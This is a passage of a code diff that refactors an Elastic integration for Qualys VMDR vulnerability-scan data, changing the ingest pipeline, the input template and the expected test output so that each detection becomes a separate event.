Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json index af39fe6e98f..d2f51d936c7 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json @@ -75,61 +75,6 @@ "scanned_duration": 1822 } }, - "list": [ - { - "affect": { - "exploitable_config": "config1", - "running": { - "kernel": "kernel1", - "service": "service1" - } - }, - "asset_cve": "cve3", - "first": { - "found_datetime": "2023-05-30T07:46:15.000Z", - "reopened_datetime": "2023-05-22T02:09:49.000Z" - }, - "fqdn": "exchb10.exchb10.local", - "instance": "instance1", - "is_disabled": true, - "is_ignored": false, - "last": { - "fixed_datetime": "2023-05-22T02:09:49.000Z", - "found_datetime": "2023-05-30T07:46:15.000Z", - "processed_datetime": "2023-05-30T07:48:14.000Z", - "reopened_datetime": "2023-05-22T02:09:49.000Z", - "test_datetime": "2023-05-30T07:46:15.000Z", - "update_datetime": "2023-05-30T07:48:14.000Z" - }, - "port": 443, - "protocol": "tcp", - "qds": { - "severity": "MEDIUM", - "text": "50" - }, - "qds_factors": [ - { - "name": "RTI", - "text": "Easy_Exploit,No_Patch" - }, - { - "name": "CVSS", - "text": "5.0" - } - ], - "qid": "11827", - "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", - "service": "service1", - "severity": 2, - "ssl": "0", - "status": "New", - "times": { - "found": 1, - "reopened": 2 - }, - "type": "Confirmed" - } - ], "metadata": { "azure": { "attribute": [ @@ -199,7 +144,60 @@ "name": "Linux" } ], - "tracking_method": "IP" + "tracking_method": "IP", + "vulnerability": { + "affect": { + "exploitable_config": "config1", + "running": { + "kernel": "kernel1", + "service": "service1" + } + }, + "asset_cve": "cve3", + "first": { + "found_datetime": "2023-05-30T07:46:15.000Z", + "reopened_datetime": "2023-05-22T02:09:49.000Z" + }, + "fqdn": "exchb10.exchb10.local", + "instance": "instance1", + "is_disabled": true, + "is_ignored": false, + "last": { + "fixed_datetime": "2023-05-22T02:09:49.000Z", + "found_datetime": "2023-05-30T07:46:15.000Z", + "processed_datetime": "2023-05-30T07:48:14.000Z", + "reopened_datetime": "2023-05-22T02:09:49.000Z", + "test_datetime": "2023-05-30T07:46:15.000Z", + "update_datetime": "2023-05-30T07:48:14.000Z" + }, + "port": 443, + "protocol": "tcp", + "qds": { + "severity": "MEDIUM", + "text": "50" + }, + "qds_factors": [ + { + "name": "RTI", + "text": "Easy_Exploit,No_Patch" + }, + { + "name": "CVSS", + "text": "5.0" + } + ], + "qid": "11827", + "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", + "service": "service1", + "severity": 2, + "ssl": "0", + "status": "New", + "times": { + "found": 1, + "reopened": 2 + }, + "type": "Confirmed" + } } }, "related": { @@ -268,45 +266,6 @@ "scanned_duration": 1822 } }, - "list": [ - { - "first": { - "found_datetime": "2023-05-30T07:46:15.000Z" - }, - "is_ignored": false, - "last": { - "found_datetime": "2023-05-30T07:46:15.000Z", - "processed_datetime": "2023-05-30T07:48:14.000Z", - "test_datetime": "2023-05-30T07:46:15.000Z", - "update_datetime": "2023-05-30T07:48:14.000Z" - }, - "port": 443, - "protocol": "tcp", - "qds": { - "severity": "MEDIUM", - "text": "50" - }, - "qds_factors": [ - { - "name": "RTI", - "text": "Easy_Exploit,No_Patch" - }, - { - "name": "CVSS", - "text": "5.0" - } - ], - "qid": "11827", - "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", - "severity": 2, - "ssl": "0", - "status": "New", - "times": { - "found": 1 - }, - "type": "Confirmed" - } - ], "netbios": "EXCHB10", "os": { "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" @@ -315,7 +274,44 @@ "id": "19429855", "name": "Linux" }, - "tracking_method": "IP" + "tracking_method": "IP", + "vulnerability": { + "first": { + "found_datetime": "2023-05-30T07:46:15.000Z" + }, + "is_ignored": false, + "last": { + "found_datetime": "2023-05-30T07:46:15.000Z", + "processed_datetime": "2023-05-30T07:48:14.000Z", + "test_datetime": "2023-05-30T07:46:15.000Z", + "update_datetime": "2023-05-30T07:48:14.000Z" + }, + "port": 443, + "protocol": "tcp", + "qds": { + "severity": "MEDIUM", + "text": "50" + }, + "qds_factors": [ + { + "name": "RTI", + "text": "Easy_Exploit,No_Patch" + }, + { + "name": "CVSS", + "text": "5.0" + } + ], + "qid": "11827", + "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", + "severity": 2, + "ssl": "0", + "status": "New", + "times": { + "found": 1 + }, + "type": "Confirmed" + } } }, "related": { @@ -381,7 +377,22 @@ "scanned_duration": 1822 } }, - "list": { + "netbios": "EXCHB10", + "os": { + "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" + }, + "tags": [ + { + "id": "19427596", + "name": "Sales" + }, + { + "id": "19429855", + "name": "Linux" + } + ], + "tracking_method": "IP", + "vulnerability": { "first": { "found_datetime": "2023-05-30T07:46:15.000Z" }, @@ -418,22 +429,7 @@ "found": 1 }, "type": "Confirmed" - }, - "netbios": "EXCHB10", - "os": { - "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" - }, - "tags": [ - { - "id": "19427596", - "name": "Sales" - }, - { - "id": "19429855", - "name": "Linux" - } - ], - "tracking_method": "IP" + } } }, "related": { @@ -499,7 +495,16 @@ "scanned_duration": 1822 } }, - "list": { + "netbios": "EXCHB10", + "os": { + "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" + }, + "tags": { + "id": "19429855", + "name": "Linux" + }, + "tracking_method": "IP", + "vulnerability": { "first": { "found_datetime": "2023-05-30T07:46:15.000Z" }, @@ -536,16 +541,7 @@ "found": 1 }, "type": "Confirmed" - }, - "netbios": "EXCHB10", - "os": { - "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" - }, - "tags": { - "id": "19429855", - "name": "Linux" - }, - "tracking_method": "IP" + } } }, "related": { @@ -677,7 +673,16 @@ "scanned_duration": 1806 } }, - "list": { + "netbios": "WIN-D24CK5NN676", + "os": { + "value": "Windows 2016" + }, + "tags": { + "id": "19429857", + "name": "Windows" + }, + "tracking_method": "IP", + "vulnerability": { "first": { "found_datetime": "2023-05-30T11:49:24.000Z" }, @@ -693,16 +698,7 @@ "found": 38 }, "type": "Info" - }, - "netbios": "WIN-D24CK5NN676", - "os": { - "value": "Windows 2016" - }, - "tags": { - "id": "19429857", - "name": "Windows" - }, - "tracking_method": "IP" + } } }, "related": { @@ -792,46 +788,6 @@ "scanned_duration": 1822 } }, - "list": [ - { - "first": { - "found_datetime": "2023-05-30T07:46:15.000Z" - }, - "is_disabled": true, - "is_ignored": false, - "last": { - "found_datetime": "2023-05-30T07:46:15.000Z", - "processed_datetime": "2023-05-30T07:48:14.000Z", - "test_datetime": "2023-05-30T07:46:15.000Z", - "update_datetime": "2023-05-30T07:48:14.000Z" - }, - "port": 443, - "protocol": "tcp", - "qds": { - "severity": "MEDIUM", - "text": "50" - }, - "qds_factors": [ - { - "name": "RTI", - "text": "Easy_Exploit,No_Patch" - }, - { - "name": "CVSS", - "text": "5.0" - } - ], - "qid": "11827", - "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", - "severity": 2, - "ssl": "0", - "status": "New", - "times": { - "found": 1 - }, - "type": "Confirmed" - } - ], "metadata": { "azure": { "attribute": { @@ -892,7 +848,45 @@ "name": "Linux" } ], - "tracking_method": "IP" + "tracking_method": "IP", + "vulnerability": { + "first": { + "found_datetime": "2023-05-30T07:46:15.000Z" + }, + "is_disabled": true, + "is_ignored": false, + "last": { + "found_datetime": "2023-05-30T07:46:15.000Z", + "processed_datetime": "2023-05-30T07:48:14.000Z", + "test_datetime": "2023-05-30T07:46:15.000Z", + "update_datetime": "2023-05-30T07:48:14.000Z" + }, + "port": 443, + "protocol": "tcp", + "qds": { + "severity": "MEDIUM", + "text": "50" + }, + "qds_factors": [ + { + "name": "RTI", + "text": "Easy_Exploit,No_Patch" + }, + { + "name": "CVSS", + "text": "5.0" + } + ], + "qid": "11827", + "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", + "severity": 2, + "ssl": "0", + "status": "New", + "times": { + "found": 1 + }, + "type": "Confirmed" + } } }, "related": { diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml index 2e80cc9d5a0..f24e7929eba 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml @@ -8,4 +8,4 @@ data_stream: url: http://{{Hostname}}:{{Port}} preserve_duplicate_custom_fields: true assert: - hit_count: 1 + hit_count: 2 diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs b/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs index b93606f3126..63f16d44cc0 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs @@ -36,9 +36,11 @@ program: | "Authorization": ["Basic "+string(base64(state.user+":"+state.password))], } }).do_request().as(resp, bytes(resp.Body).decode_xml('qualys_api_2_0').as(body, { - "events": body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.HOST_LIST.HOST.map(e, { - "message": e.encode_json(), - }), + "events": body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.HOST_LIST.HOST.map(h, + h.DETECTION_LIST.DETECTION.map(v, { + "message": h.with({"DETECTION_LIST": v}).encode_json(), + }) + ).flatten(), "url": ( has(body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.WARNING) && has(body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.WARNING.URL) ? diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml index aca46365244..b17dad52824 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml @@ -780,496 +780,402 @@ processors: lang: painless tag: script_to_set_IS_DISABLED description: Script to set IS_DISABLED for 0 and 1 values. - if: ctx.json?.DETECTION_LIST?.DETECTION instanceof List + if: ctx.json?.DETECTION_LIST != null source: >- - for (def obj : ctx.json.DETECTION_LIST.DETECTION) { - if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('0')) { - obj.remove("IS_DISABLED"); - obj.put("IS_DISABLED", false); - } else if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('1')) { - obj.remove("IS_DISABLED"); - obj.put("IS_DISABLED", true); - } + def obj = ctx.json.DETECTION_LIST; + if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('0')) { + obj.remove("IS_DISABLED"); + obj.put("IS_DISABLED", false); + } else if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('1')) { + obj.remove("IS_DISABLED"); + obj.put("IS_DISABLED", true); } - script: lang: painless tag: script_to_set_IS_IGNORED description: Script to set IS_IGNORED for 0 and 1 values. - if: ctx.json?.DETECTION_LIST?.DETECTION instanceof List + if: ctx.json?.DETECTION_LIST != null source: >- - for (def obj : ctx.json.DETECTION_LIST.DETECTION) { - if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('0')) { - obj.remove("IS_IGNORED"); - obj.put("IS_IGNORED", false); - } else if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('1')) { - obj.remove("IS_IGNORED"); - obj.put("IS_IGNORED", true); - } + def obj = ctx.json.DETECTION_LIST; + if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('0')) { + obj.remove("IS_IGNORED"); + obj.put("IS_IGNORED", false); + } else if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('1')) { + obj.remove("IS_IGNORED"); + obj.put("IS_IGNORED", true); } - rename: - field: json.DETECTION_LIST.DETECTION - tag: rename_DETECTION_LIST_DETECTION - target_field: qualys_vmdr.asset_host_detection.list + field: json.DETECTION_LIST + tag: rename_DETECTION_LIST + target_field: qualys_vmdr.asset_host_detection.vulnerability + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.UNIQUE_VULN_ID != null + field: qualys_vmdr.asset_host_detection.vulnerability.UNIQUE_VULN_ID + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_UNIQUE_VULN_ID + target_field: qualys_vmdr.asset_host_detection.vulnerability.unique_vuln_id + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.PROTOCOL != null + field: qualys_vmdr.asset_host_detection.vulnerability.PROTOCOL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_PROTOCOL_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.protocol + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.FQDN != null + field: qualys_vmdr.asset_host_detection.vulnerability.FQDN + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_FQDN_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.fqdn + ignore_missing: true + - append: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.fqdn != null + field: related.hosts + tag: append_qualys_vmdr_asset_host_detection_vulnerability_fqdn_into_related_hosts_1 + value: '{{{qualys_vmdr.asset_host_detection.vulnerability.fqdn}}}' + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.INSTANCE != null + field: qualys_vmdr.asset_host_detection.vulnerability.INSTANCE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_INSTANCE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.instance + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.SERVICE != null + field: qualys_vmdr.asset_host_detection.vulnerability.SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SERVICE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.service + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.AFFECT_RUNNING_KERNEL != null + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_KERNEL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_KERNEL_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.kernel + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.AFFECT_RUNNING_SERVICE != null + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_SERVICE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.service + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.AFFECT_EXPLOITABLE_CONFIG != null + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_EXPLOITABLE_CONFIG + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_EXPLOITABLE_CONFIG_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.exploitable_config + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.ASSET_CVE != null + field: qualys_vmdr.asset_host_detection.vulnerability.ASSET_CVE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_ASSET_CVE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.asset_cve + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QID != null + field: qualys_vmdr.asset_host_detection.vulnerability.QID + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QID_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qid + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.RESULTS != null + field: qualys_vmdr.asset_host_detection.vulnerability.RESULTS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_RESULTS_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.results + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.STATUS != null + field: qualys_vmdr.asset_host_detection.vulnerability.STATUS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_STATUS_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.status + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.TYPE != null + field: qualys_vmdr.asset_host_detection.vulnerability.TYPE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_TYPE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.type + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_#text_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds.text + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.SSL != null + field: qualys_vmdr.asset_host_detection.vulnerability.SSL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SSL_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.ssl + ignore_missing: true + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.FIRST_FOUND_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_FOUND_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.first.found_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.FIRST_REOPENED_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_REOPENED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.first.reopened_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_FOUND_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FOUND_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.found_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_REOPENED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.reopened_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_PROCESSED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.processed_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_TEST_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_TEST_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.test_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_UPDATE_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_UPDATE_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.update_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_FIXED_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FIXED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.fixed_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.SEVERITY != null + field: qualys_vmdr.asset_host_detection.vulnerability.SEVERITY + target_field: qualys_vmdr.asset_host_detection.vulnerability.severity + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_SEVERITY_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.IS_IGNORED != null + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_ignored + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_IS_IGNORED_to_boolean + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.IS_DISABLED != null + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_disabled + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_IS_DISABLED_to_boolean + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.TIMES_FOUND != null + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_FOUND + target_field: qualys_vmdr.asset_host_detection.vulnerability.times.found + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_FOUND_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.TIMES_REOPENED != null + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_REOPENED + target_field: qualys_vmdr.asset_host_detection.vulnerability.times.reopened + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_REOPENED_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline 